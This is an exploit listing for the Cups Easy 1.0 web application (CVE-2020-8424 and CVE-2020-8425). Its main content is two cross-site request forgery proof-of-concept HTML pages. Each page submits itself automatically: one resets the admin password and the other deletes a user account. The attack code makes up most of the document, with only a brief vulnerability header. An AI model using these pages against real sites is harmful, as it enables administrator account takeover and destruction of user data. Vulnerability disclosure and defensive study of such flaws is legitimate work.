# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)# Date: 2020-01-28# Exploit Author: J3rryBl4nks# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/# Version: 1.0# Tested on Windows 10/Kali Rolling# CVE: CVE-2020-8424, CVE-2020-8425# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery # that would allow an attacker to change the Admin password and gain unrestricted # access to the site or delete any user.# Proof of Concept Code for Password Change:<html><body><script>history.pushState('','','/')</script><form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST"><inputtype="hidden" name="username" value="admin"/><inputtype="hidden" name="password" value="PASSWORDHERE"/><inputtype="hidden" name="change" value="Change"/><inputtype="submit" value="Submit request"/></form><script>
document.forms[0].submit();</script></body></html># Proof of concept for user delete:<html><body><script>history.pushState('','','/')</script><form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST"><inputtype="hidden" name="username" value="admin"/><inputtype="hidden" name="delete" value="Delete"/><inputtype="submit" value="Submit request"/></form><script>
document.forms[0].submit();</script></body></html>